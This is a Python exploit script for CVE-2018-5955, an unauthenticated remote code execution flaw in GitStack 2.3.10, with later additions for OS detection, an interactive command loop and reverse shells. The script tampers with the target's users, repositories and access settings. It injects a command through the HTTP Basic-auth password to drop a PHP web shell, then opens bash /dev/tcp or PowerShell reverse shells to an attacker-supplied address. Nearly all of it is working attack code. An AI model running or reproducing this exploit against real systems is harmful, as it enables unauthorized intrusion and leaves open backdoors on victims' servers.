# Exploit: GitStack 2.3.10 Unauthenticated Remote Code Execution
# Date: 18.01.2018
# Software Link: https://gitstack.com/
# Exploit Author: Kacper Szurek
# Exploit Modified by MikeTheHash
# Date: 23.06.2023
# New features: Interactive RCE, OS Detect, Reverse Shell function
# - Re-adapted to Python 3
# Original Exploit: https://www.exploit-db.com/exploits/43777
# CVE: CVE-2018-5955
# Contact: https://twitter.com/KacperSzurek
# Website: https://security.szurek.pl/
# Category: remote
#
#1. Description
#
#$_SERVER['PHP_AUTH_PW'] is directly passed to exec function.
#
#https://security.szurek.pl/gitstack-2310-unauthenticated-rce.html
#
#2. Proof of Concept
#
import requests
from requests.auth import HTTPBasicAuth
import os
import sys
import colorama
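# Banner. Raw strings keep the backslashes literal without the
# invalid-escape-sequence warning newer Pythons emit for "\_" and "\ ".
print(colorama.Fore.WHITE + r" /\_/\ ")
print(colorama.Fore.WHITE + r"/ O O \ ")
# Target (host or host:port); trimmed so a stray space pasted after the
# address does not end up inside every URL built below.
ip = input(colorama.Fore.YELLOW + "[?] IP of target > " + colorama.Style.RESET_ALL).strip()
# Fallback names, used only when the target has no existing user/repository
# to piggy-back on. Anything created with them stays behind on the target.
repository = 'rce'
username = 'rce'
password = 'rce'
# The same arbitrary value is sent as the csrftoken cookie and as the form
# field of the repository-creation request; presumably the server only
# checks that the two match.
csrf_token = 'token'
user_list = []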
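print(colorama.Fore.WHITE + "[+] Get user list")
# Enumerate existing accounts through the unauthenticated REST API. A
# connection error or a non-JSON body just leaves the list empty and we fall
# back to creating an account; the original used a bare `except: pass`,
# which also hid real bugs.
try:
    r = requests.get("http://{}/rest/user/".format(ip))
    user_list = r.json()
except (requests.RequestException, ValueError):
    user_list = []
if not isinstance(user_list, list):
    user_list = []
# The built-in 'everyone' pseudo-user is not usable for the Basic-auth
# request later on; drop it when present (the original raised and swallowed
# a ValueError when it was absent).
if 'everyone' in user_list:
    user_list.remove('everyone')
if user_list:
    username = user_list[0]
    print(colorama.Fore.WHITE + "[+] Found user {}".format(username))
else:
    r = requests.post("http://{}/rest/user/".format(ip), data={'username': username, 'password': password})
    print(colorama.Fore.WHITE + "[+] Create user")
    if "User created" not in r.text and "User already exist" not in r.text:
        print(colorama.Back.RED + colorama.Fore.WHITE + "[-] Cannot create user" + colorama.Style.RESET_ALL)
        # sys.exit flushes stdout (os._exit could drop the message when piped)
        # and reports failure with a non-zero status instead of 0.
        sys.exit(1)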
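# The PHP web viewer (gitphp) is where the vulnerable Basic-auth handling
# lives and where exploit.php will be served from, so it must be enabled.
r = requests.get("http://{}/rest/settings/general/webinterface/".format(ip))
if "true" in r.text:
    print(colorama.Fore.WHITE + "[+] Web repository already enabled")
else:
    print(colorama.Fore.WHITE + "[+] Enable web repository")
    # Note: this flips a server-wide setting on the target; it is not
    # reverted by this script.
    r = requests.put("http://{}/rest/settings/general/webinterface/".format(ip), data='{"enabled" : "true"}')
    if "Web interface successfully enabled" not in r.text:
        print(colorama.Back.RED + colorama.Fore.WHITE + "[-] Cannot enable web interface" + colorama.Style.RESET_ALL)
        # Non-zero exit status on failure; sys.exit also flushes stdout.
        sys.exit(1)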
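print(colorama.Fore.WHITE + "[+] Get repositories list")
r = requests.get("http://{}/rest/repository/".format(ip))
# A non-JSON body (e.g. an HTML error page) used to raise an uncaught
# exception here; treat it like "no repositories" and try to create one.
try:
    repository_list = r.json()
except ValueError:
    repository_list = []
if not isinstance(repository_list, list):
    repository_list = []
if repository_list:
    repository = repository_list[0]['name']
    print(colorama.Fore.WHITE + "[+] Found repository {}".format(repository))
else:
    print(colorama.Fore.WHITE + "[+] Create repository")
    # The csrftoken cookie and csrfmiddlewaretoken field carry the same
    # arbitrary value; presumably only their equality is verified.
    r = requests.post("http://{}/rest/repository/".format(ip), cookies={'csrftoken': csrf_token}, data={'name': repository, 'csrfmiddlewaretoken': csrf_token})
    if "The repository has been successfully created" not in r.text and "Repository already exist" not in r.text:
        print(colorama.Back.RED + colorama.Fore.WHITE + "[-] Cannot create repository" + colorama.Style.RESET_ALL)
        # Non-zero exit status on failure; sys.exit also flushes stdout.
        sys.exit(1)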
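print(colorama.Fore.WHITE + "[+] Add user to repository")
r = requests.post("http://{}/rest/repository/{}/user/{}/".format(ip, repository, username))
if "added to" not in r.text and "has already" not in r.text:
    print(colorama.Back.RED + colorama.Fore.WHITE + "[-] Cannot add user to repository" + colorama.Style.RESET_ALL)
    # Non-zero exit status on failure; sys.exit also flushes stdout.
    sys.exit(1)
print(colorama.Fore.WHITE + "[+] Disable access for anyone")
# Removing the 'everyone' principal presumably forces the web viewer to
# evaluate HTTP Basic auth, which is where the injectable password travels.
# This changes the target's access configuration and is not reverted here.
r = requests.delete("http://{}/rest/repository/{}/user/{}/".format(ip, repository, "everyone"))
# The success message appears to name the repository; the original
# hard-coded "rce", so this check failed whenever an existing repository
# with a different name was picked up above.
if "everyone removed from {}".format(repository) not in r.text and "not in list" not in r.text:
    print(colorama.Back.RED + colorama.Fore.WHITE + "[-] Cannot remove access for anyone" + colorama.Style.RESET_ALL)
    sys.exit(1)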
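print(colorama.Fore.WHITE + "[+] Create backdoor in PHP")
# CVE-2018-5955: gitphp hands $_SERVER['PHP_AUTH_PW'] to exec() unescaped,
# so the Basic-auth "password" below is a shell command that writes an
# unauthenticated web shell (exploit.php) into the served directory.
# NOTE: exploit.php is usable by anyone who can reach the host; delete
# c:\GitStack\gitphp\exploit.php when finished.
# Backslashes in the path are doubled so Python does not try to interpret
# them as escape sequences (the runtime value is unchanged).
r = requests.get(
    'http://{}/web/index.php?p={}.git&a=summary'.format(ip, repository),
    auth=HTTPBasicAuth(username, 'p && echo "<?php system($_POST[\'a\']); ?>" > c:\\GitStack\\gitphp\\exploit.php'),
)
print("******************************************************************")
# Re-encode with the console codec so undisplayable characters are replaced
# instead of raising; decode with the *same* codec (the original decoded as
# UTF-8, which can fail on a non-UTF-8 console).
enc = sys.stdout.encoding or 'utf-8'
output = r.text.encode(enc, errors='replace')
print(output.decode(enc, errors='replace'))
print("******************************************************************")
# From here (Well, actually i modified also the color of some prints() lol) the script is modified by MikeTheHash
# Happy hacking!
print(colorama.Fore.BLUE + f"[*] Type '{colorama.Fore.WHITE}shell{colorama.Fore.BLUE}' to get a reverse shell")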
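def execute(commandvar, background=False):
    """Run *commandvar* on the target through the dropped exploit.php.

    Args:
        commandvar: shell command string; it is POSTed as form field ``a``
            and passed to PHP ``system()`` by the web shell.
        background: when false, print the command output and return None;
            when true, return the output as bytes without printing.

    Returns:
        bytes (output re-encoded in the console codec) when ``background``
        is true, otherwise None.

    Exceptions raised by ``requests`` (e.g. connection errors) propagate.
    """
    # exploit.php is unauthenticated, so this is a plain POST. No timeout is
    # set on purpose: the reverse-shell payload sent from shell() keeps this
    # request open for as long as the shell lives.
    if not background:
        print(colorama.Fore.WHITE + "[+] Execute command" + colorama.Style.RESET_ALL)
    r = requests.post("http://{}/web/exploit.php".format(ip), data={'a': commandvar})
    # Encode with the console codec so undisplayable characters are replaced
    # rather than raising; decode with the same codec (the original decoded
    # as UTF-8, which can fail on a non-UTF-8 console).
    enc = sys.stdout.encoding or 'utf-8'
    output = r.text.encode(enc, errors='replace')
    if background:
        return output
    print(output.decode(enc, errors='replace'))
    return None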
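def checkOS():
    """Guess the target OS by running ``uname`` through the web shell.

    Returns:
        "Linux" when the output of ``uname`` contains "Linux", otherwise
        "Windows" (where there is typically no ``uname`` and nothing is
        printed to stdout).

    The original compared the bytes returned by ``execute(..., True)``
    against a str, which is never equal in Python 3, so it always reported
    "Windows" regardless of the target.
    """
    probe = execute("uname", True)
    if isinstance(probe, bytes):
        probe = probe.decode(sys.stdout.encoding or 'utf-8', errors='replace')
    # Local result is not called `os` so the module name is not shadowed.
    detected = "Linux" if "Linux" in (probe or "") else "Windows"
    return detected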
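def shell(os):
    """Make the target connect back to a listener you control.

    Args:
        os: "Linux" or "Windows" as returned by checkOS(); anything else is
            reported as unsupported. (The parameter name is kept for
            compatibility even though it shadows the ``os`` module, which
            this function does not use.)

    Prompts for the listener address and port, then sends the payload via
    execute(); expect that POST to block while the shell is alive, so start
    the listener (``nc -nlvp PORT``) first.
    """
    if os not in ("Linux", "Windows"):
        print(f"{colorama.Back.WHITE}{colorama.Fore.WHITE}OS Not compatible!{colorama.Style.RESET_ALL}")
        return
    # The reminder used to be printed for Linux only; it applies to both.
    print(colorama.Fore.BLUE + "[*] Starting the reverse shell process")
    print(colorama.Fore.RED + "[!]" + colorama.Fore.WHITE + " Attention:" + colorama.Fore.BLUE + " YOU NEED TO START NETCAT (nc -nlvp port)")
    ipaddr = input(colorama.Fore.YELLOW + "[?] Please enter the IP address for the shell: ").strip()
    port = input(colorama.Fore.YELLOW + "[?] Please enter the port number for the shell: " + colorama.Style.RESET_ALL).strip()
    if not port.isdigit():
        # A non-numeric port would only produce a confusing remote error.
        print(colorama.Fore.RED + "[-] Port must be numeric" + colorama.Style.RESET_ALL)
        return
    if os == "Linux":
        # The original sent `bash bash -i ...`, which makes bash look for a
        # script file named "bash". /dev/tcp is a bash feature, so the
        # redirection must be evaluated by bash itself, hence `bash -c`.
        execute(f'bash -c "bash -i >& /dev/tcp/{ipaddr}/{port} 0>&1"', True)
    else:
        # Standard PowerShell TCP client reverse shell; unchanged.
        execute("powershell.exe -c \"$client = New-Object System.Net.Sockets.TCPClient('" + ipaddr + "'," + port + ");$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"", True)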
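# Interactive loop. The OS is probed once: every checkOS() call is a round
# trip to the target, and the original re-probed on each "ls"/"ifconfig"/
# "ipconfig"/"os"/"shell" command.
target_os = checkOS()
print(colorama.Fore.BLUE + "[*] OS : " + colorama.Fore.WHITE + target_os + colorama.Style.RESET_ALL)
# Convenience aliases so the habitual command of one platform works on the
# other (same mapping as the original if/elif chain).
aliases = {
    "Windows": {"ls": "dir", "ifconfig": "ipconfig"},
    "Linux": {"ipconfig": "ifconfig"},
}
while True:
    try:
        command = input("RCE > ")
    except (EOFError, KeyboardInterrupt):
        # Ctrl-D / Ctrl-C: leave cleanly instead of with a traceback.
        print()
        break
    # Blank or whitespace-only input is ignored (the original only special-
    # cased "" and " ").
    if not command.strip():
        continue
    if command == "exit":
        break
    if command == "os":
        print(target_os)
    elif command == "shell":
        shell(target_os)
    else:
        execute(aliases.get(target_os, {}).get(command, command))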